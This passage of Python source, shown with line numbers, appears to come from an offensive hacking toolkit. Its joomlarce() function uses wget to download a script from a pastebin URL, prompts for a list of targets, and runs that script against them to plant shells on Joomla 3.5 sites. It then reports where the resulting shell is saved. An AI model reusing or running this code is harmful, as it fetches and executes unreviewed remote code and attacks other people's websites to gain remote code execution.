()
| 423 | |
| 424 | |
| 425 | def joomlarce(): |
| 426 | os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") |
| 427 | clearScr() |
| 428 | print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") |
| 429 | jmtarget = raw_input("Select a targets list :") |
| 430 | os.system("python temp.py %s" % jmtarget) |
| 431 | |
| 432 | |
| 433 | def inurl(): |